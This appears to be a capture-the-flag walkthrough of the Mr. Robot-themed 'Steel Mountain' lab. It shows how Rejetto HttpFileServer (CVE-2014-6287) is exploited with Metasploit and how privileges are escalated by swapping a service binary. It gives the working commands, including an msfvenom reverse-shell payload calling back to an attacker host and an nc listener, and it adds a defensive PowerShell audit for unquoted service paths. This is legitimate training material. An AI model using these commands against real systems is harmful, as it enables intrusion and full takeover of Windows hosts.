Steel Mountain Walkthrough
INTRODUCTION:
This room, Steel Mountain, is themed on the TV series Mr. Robot.
The first question in the introduction part is:
What is the name of the Employee of the Month?
If we open the web page and download the image, the name is visible there, as shown in the screenshot below:
INITIAL ACCESS:
As on any other machine, our first step in this part is to run an nmap scan:
Command: nmap -T5 -p- -A <Target IP>
The results are shown in the screenshots below:
Q2.1 Scan the machine with nmap. What is the other port running a web server on?
Ans2.1: 8080
Q2.2 Take a look at the other web server. What file server is running?
Ans2.2: Rejetto HTTP FILE SERVER
We can find it by browsing to port 8080 on the target:
Clicking the link redirects us to the file server's own page.
Searching Google for the CVE affecting HttpFileServer 2.3 gives us the answer.
Q2.3 What is the CVE number to exploit this file server?
Ans2.3: 2014-6287
Now we will use Metasploit to gain initial access.
Start it with the command: msfconsole
Next we search for an exploit for HttpFileServer.
Metasploit finds one:
We select it with:
Command: use 0
Now we set RPORT, RHOST and LHOST:
Command: set RPORT 8080
set RHOST <Target IP>
set LHOST <Attacker IP>
With these options set, we launch the exploit:
Command: exploit
We get a shell:
The user flag is inside C:/Users/bill/Desktop
With the user flag in hand, we now need to escalate our privileges to get the root flag.
PRIVILEGE ESCALATION:
To find a privilege escalation path we can use the PowerUp.ps1 script.
We upload it to the machine from the Meterpreter session with the command: upload <script Path>
To run it, we first load the PowerShell extension and open a PowerShell prompt:
load powershell
powershell_shell
Then we run the script:
Command: . .\PowerUp.ps1
The output looks like this, and it contains the answer to the next question:
Q3.2: Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
Ans3.2: AdvancedSystemCareService9
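The defender's counterpart to this finding, added here and not part of the original walkthrough: a PowerShell audit that lists every service whose image path is unquoted and contains a space, and a helper that quotes only the executable part in the registry. The function names are my own; run it from an elevated prompt on the host being reviewed.

```powershell
# Added example (not from the walkthrough): audit a Windows host for the
# unquoted-service-path weakness that PowerUp reported above, and fix it.

function Get-UnquotedServicePath {
    # Returns services whose executable path is not quoted yet contains a space.
    # For such a path the Service Control Manager tries each prefix that ends
    # at a space (e.g. C:\Program.exe) before reaching the intended binary.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $image = $_.PathName
        if (-not $image -or $image.StartsWith('"')) { return }
        # Split the executable from any trailing arguments ("... .exe -k foo").
        if ($image -notmatch '^(?<exe>.*?\.exe)(?<args>.*)$') { return }
        $exe  = $Matches.exe
        $rest = $Matches.args
        if ($exe -match ' ') {
            [PSCustomObject]@{
                Name      = $_.Name
                RunAs     = $_.StartName      # LocalSystem here means a full compromise
                StartMode = $_.StartMode
                ImagePath = $image
                FixedPath = '"' + $exe + '"' + $rest
            }
        }
    }
}

function Repair-UnquotedServicePath {
    # Writes the quoted path back to the service's ImagePath registry value,
    # leaving any arguments untouched. Takes effect on the next service start.
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$FixedPath
    )
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    Set-ItemProperty -Path $key -Name ImagePath -Value $FixedPath
}

$findings = Get-UnquotedServicePath
$findings | Format-Table Name, RunAs, StartMode, ImagePath -AutoSize

# After reviewing the list, remediate every finding:
# $findings | ForEach-Object { Repair-UnquotedServicePath -Name $_.Name -FixedPath $_.FixedPath }
```

Services that run as LocalSystem from a directory writable by ordinary users are the ones to fix first; tightening the directory ACL closes the same gap from the other side.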
Now we will build a malicious executable named ASCService.exe and swap it in for the original one to get a reverse shell.
First we drop into a Windows command shell with the
command: shell
Now we stop the service:
Command: sc stop AdvancedSystemCareService9
Next we create the malicious executable on our own machine with msfvenom.
Command: msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
Now we upload it to the victim machine, the same way as before.
Then we copy the executable into the original directory of ASCService.
Command: copy "C:\Users\bill\Desktop\ASCService.exe" "C:\Program Files (x86)\IObit\Advanced SystemCare\"
Now we set up a listener on our attacking machine to catch the shell.
Command: nc -nlvp 4443
Now we start the service to trigger our payload.
Command: sc start AdvancedSystemCareService9
After the service starts, we finally receive the reverse shell on our listener:
The root flag is inside: C:\Users\Administrator\Desktop